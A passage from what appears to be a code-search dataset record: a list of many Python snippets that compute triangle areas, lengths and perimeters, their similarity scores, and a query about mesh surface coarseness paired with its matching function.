axis=-1)\n len_edge_02 = gs.linalg.norm((vertex_0 - vertex_2), axis=-1)\n len_edge_01 = gs.linalg.norm((vertex_0 - vertex_1), axis=-1)\n half_perimeter = 0.5 * (len_edge_12 + len_edge_02 + len_edge_01)\n return gs.sqrt(\n (\n half_perimeter\n * (half_perimeter - len_edge_12)\n * (half_perimeter - len_edge_02)\n * (half_perimeter - len_edge_01)\n ).clip(min=1e-6)\n )", "def triangle_edges(length=2.0, divisions=4)):\n\n def _edges_from_triangle(triangle):\n a, b, c = triangle\n return [(a, b), (b, c), (c, a)]\n\n vertices, facets = triangle_facets(length, divisions)\n edges = []\n for facet in facets:\n edges.extend(_edges_from_triangle(facet))\n return vertices, edges", "def get_length_hexagon():\n length = float(input(\"What is the side length of the hexagon?\"))\n return length", "def euclidian_length(self):\n\n if self.get_len() > 1:\n shape_length = 0\n last_x = self.x\n last_y = self.y\n scale = [0]\n for i in range(self.len - 2):\n x = np.array(self.x[i + 1])\n y = np.array(self.y[i + 1])\n last_x = np.array(self.x[i])\n last_y = np.array(self.y[i])\n shape_length += np.sqrt((x - last_x) ** 2 + (y - last_y) ** 2)\n scale.append(shape_length)\n return shape_length, scale\n\n else:\n return 0, [0]", "def test_get_triangle_area():\n v1 = (0,0); v2 = (1,0); v3 = (0,2)\n verticies = [v1,v2,v3]\n expected = 1\n computed = get_triangle_area(verticies)\n tol = 1E-14\n success = abs(expected-computed) < tol\n msg = 'computed area={} != {} (expected)'.format(computed,expected)\n assert success,msg", "def triangle(p1, p2, p3, width, height):\r\n v1 = vec2(round(p1.x), round(p1.y))\r\n v2 = vec2(round(p2.x), round(p2.y))\r\n v3 = vec2(round(p3.x), round(p3.y))\r\n if (v1.y > v2.y):\r\n temp = v1\r\n v1 = v2\r\n v2 = temp\r\n if (v1.y > v3.y):\r\n temp = v1\r\n v1 = v3\r\n v3 = temp\r\n if (v2.y > v3.y):\r\n temp = v2\r\n v2 = v3\r\n v3 = temp\r\n if (v1.y != v2.y): k_12 = (v2.x - v1.x)/(v2.y - v1.y)\r\n if (v1.y != v3.y): k_13 = (v3.x - v1.x)/(v3.y - v1.y)\r\n if (v2.y != v3.y): k_23 = (v3.x - v2.x)/(v3.y - v2.y)\r\n if (v1.y == v2.y):\r\n if (v1.x < v2.x):\r\n xl, xu = v1.x, v2.x\r\n left = False\r\n else:\r\n xl, xu = v2.x, v1.x\r\n left = True\r\n if (v1.y >= 0 and v1.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v1.y)\r\n else:\r\n left = v2.x < k_13*(v2.y - v1.y) + v1.x\r\n if (left):\r\n k1, k2 = k_12, k_13\r\n else:\r\n k1, k2 = k_13, k_12\r\n yl = max(v1.y, 0)\r\n yu = min(v2.y, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - v1.y) + v1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - v1.y) + v1.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)\r\n if (v2.y == v3.y):\r\n if (v2.x < v3.x):\r\n xl, xu = v2.x, v3.x\r\n else:\r\n xl, xu = v3.x, v2.x\r\n if (v2.y >= 0 and v2.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v2.y)\r\n else:\r\n if (left):\r\n k1, k2 = k_23, k_13\r\n t1, t2 = v2, v1\r\n else:\r\n k1, k2 = k_13, k_23\r\n t1, t2 = v1, v2\r\n yl = max(v2.y, 0)\r\n yu = min(v3.y + 1, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - t1.y) + t1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - t2.y) + t2.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)", "def validate_triangle(sides: list) -> bool:\n\n if 0 in sides:\n return False\n if sum(sides[:2]) < sides[2]\\\n or sum([sides[0], sides[2]]) < sides[1]\\\n or sum(sides[1:]) < sides[0]:\n return False\n return True", "def triangleArea(p0, p1, p2):\n return 0.5 * (\n -p1[1] * p2[0]\n + p0[1] * (-p1[0] + p2[0])\n + p0[0] * (p1[1] - p2[1])\n + p1[0] * p2[1]\n )", "def triangle_number(n):\n return n * (n + 1) / 2", "def triangle(t, s, l, l2):\n\tan = 360/s\n\tang = (180 - an)/2\n\tfor i in range (3):\n\t\tif i%2 == 0:\n\t\t\tfd(t, l2)\n\t\telse:\n\t\t\tfd(t, l)\n\t\tlt(t, 180 - ang)\n\tlt (t, ang)", "def polyline_length(pts):\n total_length = 0\n p0 = Point(pts[0])\n for p in pts[1:]:\n p1 = Point(p)\n total_length += p0.distance_to(p1)\n p0 = p1\n return total_length", "def length(vector):\n a, b, c = vector\n return math.sqrt(a ** 2 + b ** 2 + c ** 2)", "def length(self):\n points = [Point(v, crs=self.crs) for v in self.vertices]\n distances = [a.distance(b) for a, b in zip(points[:-1], points[1:])]\n return sum(distances)", "def slope_bricks_per_level_per_side(side_length):\n # Get the number of 4x2 slope bricks needed.\n four_brick_count = int(side_length / 4)\n remainder_bricks = side_length % 4 if side_length > 0 else 0\n # Calculate the remainder bricks you need.\n remainder_two_bricks = 1 if remainder_bricks > 1 else 0\n remainder_one_bricks = remainder_bricks % 2\n return four_brick_count, remainder_two_bricks, remainder_one_bricks", "def area_triangle(triangle):\n return 0.5 * length_vector(normal_triangle(triangle, False))", "def yield_right_isosceles_triangles(cls):\n for i in range(1, 142):\n yield 1 * i, 1 * i, sqrt(2) * i", "def perimeter(self):\n return (\n self.side_1_length +\n self.side_2_length +\n self.side_3_length +\n self.side_4_length\n )", "def perimeter(self):\n return sum([s.length for s in self.segments])", "def get_pathlengths(inp, origin, wires):\n\n lengths = np.full(wires.shape, fill_value=np.inf) # shape (2, posx, posy), float for inf sentinel\n lengths[:, origin[0], origin[1]] = 0\n for i,line in enumerate(inp.splitlines()):\n pos = origin.copy()\n pathlen = 0\n for word in line.split(','):\n dir,length = word[0], int(word[1:])\n l = np.arange(1, length + 1)\n # need min(...) for masking, hence inf sentinel\n if dir == 'R':\n lengths[i, pos[0] + l, pos[1] + 0*l] = np.minimum(l + pathlen, lengths[i, pos[0] + l, pos[1] + 0*l])\n pos += [length, 0]\n if dir == 'L':\n lengths[i, pos[0] - l, pos[1] + 0*l] = np.minimum(l + pathlen, lengths[i, pos[0] - l, pos[1] + 0*l])\n pos += [-length, 0]\n if dir == 'U':\n lengths[i, pos[0] + 0*l, pos[1] + l] = np.minimum(l + pathlen, lengths[i, pos[0] + 0*l, pos[1] + l])\n pos += [0, length]\n if dir == 'D':\n lengths[i, pos[0] + 0*l, pos[1] - l] = np.minimum(l + pathlen, lengths[i, pos[0] + 0*l, pos[1] - l])\n pos += [0, -length]\n pathlen += length\n\n # unmask, return int array of paths\n lengths[np.isinf(lengths)] = -1\n return lengths.astype(np.uint8)", "def triangle_number(n):\n return n * (n + 1) // 2", "def get_triangles_per_vertex(my_core, native_ranges):\n\n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def tf_box_3d_diagonal_length(boxes_3d):\n\n lengths_sqr = tf.square(boxes_3d[:, 3])\n width_sqr = tf.square(boxes_3d[:, 4])\n height_sqr = tf.square(boxes_3d[:, 5])\n\n lwh_sqr_sums = lengths_sqr + width_sqr + height_sqr\n diagonals = tf.sqrt(lwh_sqr_sums)\n\n return diagonals", "def perimeter(self):\n return self.sidelength1 + self.sidelength2 + self.baselength1 + self.baselength2", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def triArea(base,height):\n return base * height /2", "def get_triangle_numbers(n):\n r = []\n for i in xrange(1, n + 1):\n t = ((i * (i + 1)) / 2)\n r.append(t)\n return r", "def corner_half_length(a, b):\n x = (a - b) / (a + b)\n return pi / 8 * (a + b) * (\n 1 + 3 * x ** 2 / (10 + sqrt(4 - 3 * x ** 2)))", "def arm_length(self, *args):\n i, j = args\n return Partition(list(self)).arm_length(i-1, j-1)", "def length(self):\n return math.sqrt(self.x**2 + self.y**2 + self.z**2)", "def length(self):\n return math.sqrt(self.x * self.x + self.y * self.y)", "def _upward_triangle_indicies(height=3):\n return [(height-r,c) for r in range(height) for c in range(-abs(r),abs(r)+1)]", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def veclength(vec):\n vec = np.array(vec, copy=False).reshape(-1, 3)\n return np.sqrt(np.einsum('ij,ij->i', vec, vec))", "def length(vec):\n return np.linalg.norm(vec)", "def aireTriangle(b, h):\n return (b * h) / 2", "def triangle_areas(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n xy = points[triangles]\n # s1 = xy[:, 2, :] - xy[:, 1, :]\n # s2 = xy[:, 0, :] - xy[:, 2, :]\n # s3 = xy[:, 1, :] - xy[:, 0, :]\n # which can be simplified to\n # s = xy[:, [2, 0, 1]] - xy[:, [1, 2, 0]] # 3D\n s = xy[:, [2, 0]] - xy[:, [1, 2]] # 2D\n a = np.linalg.det(s)\n return a * 0.5", "def get_max_length_diff_in_quad(points):\n leftmost, uppermost, rightmost, bottommost = (points[0, 0] for i in range(4))\n for point in points:\n x = point[0, 0]\n y = point[0, 1]\n if x < leftmost[0]:\n # Point is located on the left side of leftmost point\n leftmost = point[0]\n elif x > rightmost[0]:\n rightmost = point[0]\n elif y < uppermost[1]:\n uppermost = point[0]\n elif y > bottommost[1]:\n bottommost = point[0]\n\n length_diff = [cv2.norm(uppermost - leftmost),\n cv2.norm(rightmost - uppermost),\n cv2.norm(bottommost - rightmost),\n cv2.norm(leftmost - bottommost)]\n return np.max(length_diff)", "def linelength(l):\n return dist(l[0],l[1])", "def length(self):\n return math.sqrt(\n (self.endpoint_a.northing - self.endpoint_b.northing) ** 2 +\n (self.endpoint_a.easting - self.endpoint_b.easting) ** 2\n )", "def office_get_quadratic_steplength(parser, args, params):\n parser.add_argument('p1x', metavar='p1x', type=float, nargs=1)\n parser.add_argument('p1y', metavar='p1y', type=float, nargs=1)\n parser.add_argument('p2x', metavar='p2x', type=float, nargs=1) \n parser.add_argument('p2y', metavar='p2y', type=float, nargs=1) \n parser.add_argument('p3x', metavar='p3x', type=float, nargs=1) \n parser.add_argument('p3y', metavar='p3y', type=float, nargs=1) \n \n local_args = parser.parse_known_args(args[1:])\n p1 = local_args[0].p1x[0]\n m1 = local_args[0].p1y[0]\n p2 = local_args[0].p2x[0]\n m2 = local_args[0].p2y[0]\n p3 = local_args[0].p3x[0]\n m3 = local_args[0].p3y[0]\n \n control.get_quadratic_steplength(p1, m1, p2, m2, p3, m3)", "def len(self):\n return math.sqrt(self.v[0] * self.v[0] + self.v[1] * self.v[1])", "def get_sides_count(self):\r\n return self.__sides_count", "def area_triangle_three_sides(side1: float, side2: float, side3: float) -> float:\r\n if side1 < 0 or side2 < 0 or side3 < 0:\r\n raise ValueError(\"area_triangle_three_sides() only accepts non-negative values\")\r\n elif side1 + side2 < side3 or side1 + side3 < side2 or side2 + side3 < side1:\r\n raise ValueError(\"Given three sides do not form a triangle\")\r\n semi_perimeter = (side1 + side2 + side3) / 2\r\n area = sqrt(\r\n semi_perimeter\r\n * (semi_perimeter - side1)\r\n * (semi_perimeter - side2)\r\n * (semi_perimeter - side3)\r\n )\r\n return area", "def __init__(self, lengths):\n if len(set(lengths)) > 2:\n raise ValueError(\"This is not an isosceles triangle.\")\n super().__init__(lengths)", "def rightTriangle():\n size = int(input('Enter the size: '))\n print('Right triangle of size', size)\n pass", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def vec_len(x):\r\n \r\n length = math.sqrt(x[0]**2 + x[1]**2)\r\n return length", "def __getSideLength(self, width, height):\n\n # Get screen size from config file.\n with open(\"config.txt\") as f:\n config = json.loads(f.read())\n\n tileWidth = config[\"screenWidth\"]\n tileHeight = config[\"screenHeight\"]\n\n # Get max tile height and width.\n tileHeight = math.floor(tileHeight / (height+2))\n tileWidth = math.floor(tileWidth / (width+2))\n\n # Get the smallest of the two so the tile can be square.\n if tileHeight > tileWidth:\n sideLength = tileWidth\n else:\n sideLength = tileHeight\n\n return sideLength", "def length(a, b):\n return sqrt((a[0] - b[0]) * (a[0] - b[0]) + (a[1] - b[1]) * (a[1] - b[1]))", "def create_two_init_triangles(points):\n return [(points[0], points[1], points[2]),\n (points[0], points[2], points[3])]", "def compute_triangle_side_centroid_distances(triangle_points: np.ndarray) -> np.ndarray:\n\n def distance_point_line(point, p1, p2):\n norm_p2_p1 = norm(p2 - p1)\n norm_p2_p1 = norm_p2_p1 if norm(p2 - p1) != 0 else np.finfo(float).eps\n d = np.abs(norm(np.cross(p2 - p1, p1 - point))) / norm_p2_p1\n return d\n\n (x1, y1), (x2, y2), (x3, y3) = unpack_triangle_coordinates(triangle_points)\n # Centroid\n centroid = (((x1 + x2 + x3) / 3), ((y1 + y2 + y3) / 3))\n relative_centroid_1_2 = distance_point_line(np.array(centroid), np.array([x1, y1]), np.array([x2, y2]))\n relative_centroid_2_3 = distance_point_line(np.array(centroid), np.array([x2, y2]), np.array([x3, y3]))\n relative_centroid_3_1 = distance_point_line(np.array(centroid), np.array([x3, y3]), np.array([x1, y1]))\n centroid_distances_to_sides = np.array([relative_centroid_1_2, relative_centroid_2_3, relative_centroid_3_1])\n return centroid_distances_to_sides", "def test_right_triangle(self):\n self.assertEqual(classify_triangle(3, 4, 5), 'Right Scalene')\n self.assertEqual(classify_triangle(10, 6, 8), 'Right Scalene')\n self.assertEqual(classify_triangle(24, 25, 7), 'Right Scalene')\n\n self.assertEqual(classify_triangle(5, 5, 7.07106781187), 'Right Isosceles')\n self.assertEqual(classify_triangle(8, 11.313708499, 8), 'Right Isosceles')\n self.assertEqual(classify_triangle(14.1421356237, 10, 10), 'Right Isosceles')", "def calc_half_perimeter(self, source, sinks):\n deltax = 0\n deltay = 0\n assert self.cells[source].x in range(self.nx) and self.cells[source].y in range(self.ny)\n for sink in sinks:\n assert self.cells[sink].x in range(self.nx) and self.cells[sink].y in range(self.ny)\n dx = abs(self.cells[source].x - self.cells[sink].x)\n if dx > deltax:\n deltax = dx\n dy = abs(self.cells[source].y - self.cells[sink].y)\n if dy > deltay:\n deltay = dy\n return deltax + deltay", "def test_triangle(self):\n result = shape_area.triangle_area(10,5)\n self.assertEqual(result,25)", "def length(first):\n if isinstance(first,FreeCAD.Vector):\n return math.sqrt(first.x*first.x + first.y*first.y + first.z*first.z)", "def triangleNumber(n):\n return sum(range(n+1))", "def left_right(steps):\n lengths = lens(steps)\n a_side = []\n b_side = []\n for i in range(len(lengths)):\n if i % 2 == 0:\n a_side.append(steps[i])\n else:\n b_side.append(steps[i])\n return a_side, b_side" ]
[ "0.80329156", "0.73527324", "0.6605369", "0.6578953", "0.653027", "0.6457566", "0.6410448", "0.6380816", "0.6373851", "0.634458", "0.63425255", "0.62799424", "0.62611526", "0.62526083", "0.6235124", "0.6221507", "0.62141633", "0.61444443", "0.6128147", "0.61095893", "0.6104889", "0.60801274", "0.60788375", "0.6071254", "0.6066173", "0.6061882", "0.6059281", "0.60473496", "0.6004745", "0.60017395", "0.59889114", "0.5988143", "0.598015", "0.5976947", "0.59591794", "0.5957949", "0.5957245", "0.5934963", "0.592395", "0.5921473", "0.5920306", "0.5881472", "0.5875542", "0.5863185", "0.58588773", "0.58505327", "0.5813216", "0.5797877", "0.5797807", "0.57945967", "0.57926863", "0.5790133", "0.5778775", "0.577796", "0.5773677", "0.5772126", "0.5770336", "0.576594", "0.57576907", "0.5756743", "0.57511646", "0.57387054", "0.5733718", "0.572957", "0.57272464", "0.570798", "0.5701886", "0.5695867", "0.568324", "0.5682328", "0.56814665", "0.5667389", "0.56639093", "0.56343293", "0.5629091", "0.5626556", "0.5625807", "0.5605063", "0.5601235", "0.5599026", "0.55987084", "0.5586779", "0.55850834", "0.5583209", "0.55782783", "0.55723053", "0.5569269", "0.5560475", "0.5557526", "0.5553606", "0.55532056", "0.5543838", "0.55387545", "0.5535224", "0.5528026", "0.5527881", "0.5522822", "0.55145013", "0.55095327", "0.550904" ]
0.7491572
1
Get the coarseness of area. Coarseness is calculated by dividing surface area of a surface by number of triangles in that surface. inputs
def get_coarseness(my_core, meshset, entity_ranges, geom_dim): coarseness = [] for surface in entity_ranges: surf_area = get_area_triangle(my_core, surface, geom_dim) coarseness.append(len(surf_area)/sum(surf_area)) return coarseness
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_surface_area(self):\n return np.sum(self._find_triangle_areas())", "def compute_area(self):\r\n\r\n \"\"\"Косое произведение векторов\r\n A = (x2-x1; y2-y1; z2-z1)\r\n B = (x3-x1; y3-y1; z3-z1)\r\n S = 0.5*sqrt((Ay*Bz - Az*By)^2 + (Az*Bx - Ax*Bz)^2 + (Ax*By - Ay*Bx)^2 )\r\n \"\"\"\r\n a_x = self.x2 - self.x1\r\n a_y = self.y2 - self.y1\r\n a_z = self.z2 - self.z1\r\n\r\n b_x = self.x3 - self.x1\r\n b_y = self.y3 - self.y1\r\n b_z = self.z3 - self.z1\r\n\r\n self.area = 0.5 * math.sqrt((a_y * b_z - a_z * b_y) ** 2 + (a_z * b_x - a_x * b_z) ** 2 + (a_x * b_y - a_y * b_x) ** 2)\r\n\r\n \"\"\"По теореме Герона\"\"\"\r\n # a = math.sqrt((self.x1-self.x2)**2 + (self.y1-self.y2)**2 + (self.z1-self.z2)**2)\r\n # b = math.sqrt((self.x1-self.x3)**2 + (self.y1-self.y3)**2 + (self.z1-self.z3)**2)\r\n # c = math.sqrt((self.x2-self.x3)**2 + (self.y2-self.y3)**2 + (self.z2-self.z3)**2)\r\n # p = 0.5 * (a + b + c)\r\n # self.area = math.sqrt(p * (p - a) * (p - b) * (p - c))\r", "def solidity(cnt):\n\tarea = cv2.contourArea(cnt)\n\thull = cv2.convexHull(cnt)\n\thull_area = cv2.contourArea(hull)\n\treturn float(area) / hull_area", "def test_get_triangle_area():\n v1 = (0,0); v2 = (1,0); v3 = (0,2)\n verticies = [v1,v2,v3]\n expected = 1\n computed = get_triangle_area(verticies)\n tol = 1E-14\n success = abs(expected-computed) < tol\n msg = 'computed area={} != {} (expected)'.format(computed,expected)\n assert success,msg", "def area(self) -> float:\n return cross3(self.b.position - self.a.position,\n self.c.position - self.a.position).length() / 2.0", "def triangle_area(side1: number, side2: number, side3: number) -> number:\n s = (side1+side2+side3)/2\n area = sqrt(s*(s-side1)*(s-side2)*(s-side3))\n return sqrt(s*(s-side1)*(s-side2)*(s-side3))", "def triangleArea(a: Vec3, b: Vec3, c: Vec3) -> float:\n return cross3(b - a, c - a).length() / 2.0", "def surface_area(self) -> float:\n return 4 * np.pi * self.radius**2", "def surface_area_of_cube(side):\n return side", "def compute_triangle_area(a,b,c):\n ab = np.sqrt( ((a-b)**2).sum() )\n ac = np.sqrt( ((a-c)**2).sum() )\n bc = np.sqrt( ((b-c)**2).sum() )\n \n s = (ab+ac+bc)/2\n area = np.sqrt(s*(s-ab)*(s-bc)*(s-ac))\n \n return area", "def rectangle_surface_area(a,b):\n return (a*b)", "def calc_surface_area(faces, verts):\n # Calculate the surface area of a mesh from it's triangle faces.\n # faces: List of all the faces on the surface. Each face indexes three\n # points from verts which make up the triangle face.\n # verts: List of all the vertices on the surface.\n area = 0\n for face in faces:\n # Extract x's and y's from the face's vertices.\n xs = [verts[face[0]][0], verts[face[1]][0], verts[face[2]][0]]\n ys = [verts[face[0]][1], verts[face[1]][1], verts[face[2]][1]]\n # Compute area of face from triangle points.\n base = max(xs) - min(xs)\n height = max(ys) - min(ys)\n area += 0.5 * (base + height)\n return area", "def surfaceArea(self):\n surfaceArea = self.sideLength**2 * 6\n return surfaceArea", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def square_surface_area(a):\n return (a*a)", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def area(poly):\n if len(poly) < 3: # not a plane - no area\n return 0\n total = [0, 0, 0]\n num = len(poly)\n for i in range(num):\n vi1 = poly[i]\n vi2 = poly[(i+1) % num]\n prod = np.cross(vi1, vi2)\n total[0] += prod[0]\n total[1] += prod[1]\n total[2] += prod[2]\n result = np.dot(total, unit_normal(poly[0], poly[1], poly[2]))\n return abs(result/2)", "def area(self) -> npt.NDArray[np.float_]:\n points = self._normalized_projection()\n a = sum(det(points[..., [0, i, i + 1], :]) for i in range(1, points.shape[-2] - 1))\n return 1 / 2 * np.abs(a)", "def area_triangle_sss(side1,side2,side3):\n semi_perim=(side1+side2+side3)/2.0\n return math.sqrt(semi_perim*\n (semi_perim - side1)*\n (semi_perim - side2)*\n (semi_perim - side3)\n )", "def findArea(self):\n\n a, b = self.sides\n area = a * b\n print(f\"Are of rectangle is: {area}\")", "def getSurfaceArea(self) -> float:\n return self.area()", "def compute_area(boxes):\n area = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n\n return area", "def area(triangles):\n # sides of the triangle\n sides = great_circle_distance(triangles,\n numpy.roll(triangles, 1, axis=1))\n\n assert numpy.all(sides >= 0.)\n\n # s = (a + b + c) / 2.\n s = (numpy.sum(sides, axis=1) / 2.)\n\n # tan(s / 2) * tan((s - a) / 2) * tan((s - b) / 2) * tan((s - c) / 2)\n product = (tan(s / 2.) *\n numpy.prod(tan((s[:, numpy.newaxis] - sides) / 2.), axis=1))\n\n try:\n return 4. * arctan(sqrt(product))\n except FloatingPointError:\n # floating point weirdness\n\n def individual(prod):\n \"\"\"\n Area of an individual triangle.\n \"\"\"\n try:\n return 4. * arctan(sqrt(prod))\n except FloatingPointError:\n return 0.\n\n return numpy.array([individual(prod) for prod in product])", "def area(self) -> float:\n raise NotImplementedError", "def area_triangle_sss(side1, side2, side3):\n \n # Use Heron's formula\n semiperim = (side1 + side2 + side3) / 2.0\n return math.sqrt(semiperim *\n (semiperim - side1) *\n (semiperim - side2) * \n (semiperim - side3))", "def triangle_area(a, b, c):\n\n return 0.5 * abs(\n a[0] * (b[1] - c[1]) +\n b[0] * (c[1] - a[1]) +\n c[0] * (a[1] - b[1])\n )", "def getArea(self, p1, p2, p3):\n matrix = [p1.normalVector, p2.normalVector, p3.normalVector, [1,1,1,1]]\n matrix = np.rot90(matrix)\n return abs(np.linalg.det(matrix))/2.0", "def area(self):\n area = 0\n\n for room in self.rooms:\n area += room.polygon.area()\n\n for wall in self.walls:\n area += wall.polygon.area()\n\n return area", "def compute_triangle_area(vertices):\n v01 = vertices[0] - vertices[1]\n v02 = vertices[0] - vertices[2]\n cross_prod = np.cross(v01, v02)\n area = 0.5 * np.linalg.norm(cross_prod)\n return area", "def area(x1, y1, x2, y2, x3, y3):\n return abs((x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)) / 2.0)", "def get_coverage_area(self) -> float:\n return math.sqrt(self.norm_hull.volume)", "def surface_area_cube(side_length: float) -> float:\r\n if side_length < 0:\r\n raise ValueError(\"surface_area_cube() only accepts non-negative values\")\r\n return 6 * side_length**2", "def test_triangle_get_area(self):\n triangle = Triangle(0, 9, 10, 11)\n self.assertEqual(triangle.get_area(), 42.42640687119285)", "def cube_area(side_length):\n area = side_length ** 3\n return area", "def circle_surface_area(a):\n return (a*a*math.pi)", "def area(boxes: Union[np.array, torch.Tensor]) -> Union[np.array, torch.Tensor]:\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def test_triangle(self):\n result = shape_area.triangle_area(10,5)\n self.assertEqual(result,25)", "def areaOfTriangle(triangle):\n a = np.linalg.norm(triangle[..., 0, :] - triangle[..., 1, :])\n b = np.linalg.norm(triangle[..., 1, :] - triangle[..., 2, :])\n c = np.linalg.norm(triangle[..., 2, :] - triangle[..., 0, :])\n s = (a+b+c)/2\n # Herons formula\n return np.sqrt(s*(s-a)*(s-b)*(s-c))", "def area(self) -> npt.NDArray[np.float_]:\n return np.sum(self.faces.area)", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def get_artif_area(self):\n result = self.cities.all().aggregate(total=Sum(\"surface_artif\"))\n return result[\"total\"] or 0", "def surface_area_cone(radius: float, height: float) -> float:\r\n if radius < 0 or height < 0:\r\n raise ValueError(\"surface_area_cone() only accepts non-negative values\")\r\n return pi * radius * (radius + (height**2 + radius**2) ** 0.5)", "def cylinder_area(radius: number, height: number) -> number:\n area = 2*pi*radius*(radius+height)\n return area", "def surface_area(DEM, resolution):\n\n resolution_squared = resolution ** 2.\n cross_distance_squared = 2.0 * (resolution ** 2.)\n\n m1 = ((DEM[0:-1, 0:-1] - DEM[0:-1, 1:]) ** 2.0 + resolution_squared) ** 0.5\n m2 = ((DEM[0:-1, 0:-1] - DEM[1:, 0:-1]) ** 2.0 + resolution_squared) ** 0.5\n m3 = ((DEM[0:-1, 0:-1] - DEM[1:, 1:]) ** 2.0 + cross_distance_squared) ** 0.5\n m4 = ((DEM[0:-1, 1:] - DEM[1:, 1:]) ** 2.0 + resolution_squared) ** 0.5\n m5 = ((DEM[1:, 0:-1] - DEM[1:, 1:]) ** 2.0 + resolution_squared) ** 0.5\n\n #from pdb import set_trace; set_trace()\n # Heron's formula for computing the area of a triangle, knowing 3 sides lengths,\n # requires a semiperimeter variable \"s\"\n s1 = 0.5 * (m3 + m5 + m2)\n s2 = 0.5 * (m3 + m4 + m1)\n\n # Calculate area using Heron's formula. This computes the upper and lower triangle area for each set of 4 dem points\n area = np.sum(np.sqrt(s1 * (s1 - m3) * (s1 - m5) * (s1 - m2))) + np.sum(np.sqrt(s2 * (s2 - m3) * (s2 - m4) * (s2 - m1)))\n\n return area", "def _get_area_polygon(points_x, points_z):\n area = 0\n j = len(points_x) - 1\n for i in range(len(points_x)):\n area = area + (\n points_x[j] + points_x[i]\n ) * (points_z[j] - points_z[i])\n j = i\n return np.abs(area / 2)", "def area_of_a_triangle(length_1, length_2, length_3):\r\n half_perimeter = (length_1 + length_2 + length_3) / 2\r\n area = (half_perimeter * (half_perimeter-length_1) * (half_perimeter-length_2) * (half_perimeter-length_3)) ** 0.5\r\n return area", "def compute_triangle_area(triangle_points: np.ndarray) -> float:\n (x1, y1), (x2, y2), (x3, y3) = unpack_triangle_coordinates(triangle_points)\n # Pythagorean theorem\n l1 = sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n l2 = sqrt((x2 - x3) ** 2 + (y2 - y3) ** 2)\n l3 = sqrt((x3 - x1) ** 2 + (y3 - y1) ** 2)\n # Heron's Formula\n semi_perimeter = (l1 + l2 + l3) / 2\n to_sqrt = semi_perimeter * (semi_perimeter - l1) * (semi_perimeter - l2) * (semi_perimeter - l3)\n to_sqrt = to_sqrt if to_sqrt > 0 else 0\n area = sqrt(to_sqrt)\n return area", "def area(cnt):\n\treturn cv2.contourArea(cnt)", "def compute_mesh_area(mesh):\n vertices = mesh.vertices\n faces = mesh.faces\n areas = [compute_triangle_area(vertices[face]) for face in faces]\n mesh_surface_area = sum(areas)\n return mesh_surface_area", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def area(self):\n l = len(self.points)\n if l < 3: # The form has no point, is a single point or a segment, so it has no area.\n return 0\n elif l == 3: # The form is a triangle, so we can calculate its area.\n a, b, c = [Vector.createFromSegment(segment) for segment in self.sides]\n A = 1 / 4 * sqrt(4 * a.norm ** 2 * b.norm ** 2 - (a.norm ** 2 + b.norm ** 2 - c.norm ** 2) ** 2)\n return A\n else: # The form has more points than 3, so we can cut it in triangles.\n area = 0\n C = self.center\n for i in range(l):\n A = self.points[i]\n B = self.points[(i + 1) % l]\n triangle = Form([A, B, C])\n area += triangle.area\n return area", "def area(self):\n area = 0\n last = self._coordinates[-1]\n for c in self._coordinates:\n area += (last[0] * c[1] - last[1] * c[0])\n last = c\n return float(\"{:.2f}\".format(abs(area) * 